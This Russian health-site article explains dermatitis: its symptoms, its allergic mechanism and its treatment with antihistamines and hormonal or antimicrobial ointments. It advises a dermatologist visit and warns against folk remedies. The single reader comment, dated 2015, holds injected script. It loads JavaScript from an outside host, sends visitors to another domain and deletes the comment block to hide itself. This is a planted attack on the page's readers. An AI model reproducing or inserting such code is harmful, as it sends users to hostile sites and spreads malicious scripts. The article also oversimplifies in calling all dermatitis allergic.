Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Дерматит, или как лечить ...  >>  Дерматит, или как лечить аллергию
 
Обратная связь
 

Дерматит, или как лечить аллергию

Размер шрифта
28 февраля 2012 10:00
  • google_analytics: false
  • Нравится

Есть ли у вас покраснение или шелушение на коже? А высыпания и зуд? Возможно, это дерматит. Какие симптомы у этого «некрасивого» заболевания, и как его лечить?

1 

Дерматит – это воспаление кожи. К группе дерматитов относится множество заболеваний кожи, в том числе экзема и диатез. Их симптомы схожи тем, что и в том, и в другом случае в коже идет воспалительный процесс.

Симптомы

При дерматите на коже начинается покраснение и зуд, появляется шелушение, могут выскочить пузырьки. Воспаление при дерматите по своей природе аллергическое, а не инфекционное. И так как возникает оно в ответ на аллергены, его течение длительное (хроническое). Дерматит может превратиться в аутоиммунное хроническое заболевания и долго не оставлять человека.

Механизм заболевания

Так вот при дерматите поражается в первую очередь эпидермис и дерма. Особые клетки, тканевые базофилы, тучные клетки в ответ на появление аллергена выделяют специфические вещества, поражающие клетки кожи и ее раздражение нервных окончаний. Развивается воспаление, кожа краснеет, и человек испытывает зуд.

1

На фото: увеличенное изображение на дерматоскопе

Как лечить

Лечение при дерматите такое же, как при аллергии и воспалении. Врач может назначить:

  • Антигистаминные (противоаллергические средства)
  • Местные средства – мази или кремы. Воспаление снимается с помощью мази с гормональной составляющей. Если есть инфекция, тогда это мазь с противогрибковым или противомикробным компонентом.

Лечение зависит от причины и формы дерматита, поэтому обращение к врачу-дерматологу, который проведет обследование для выявления причины, - обязательно.

Кожа полностью обновляется и восстанавливается минимум за 3-х месяца. Поэтому ожидать результатов лечения дерматита раньше, чем они окончатся – нереально. Не торопитесь, дождитесь окончания этого минимального срока. И помните, что самолечение и народные средства могут только усугубить болезнь.

 

Сюжеты по теме:
Если кожа кипит. Как лечить экзему 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:53

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.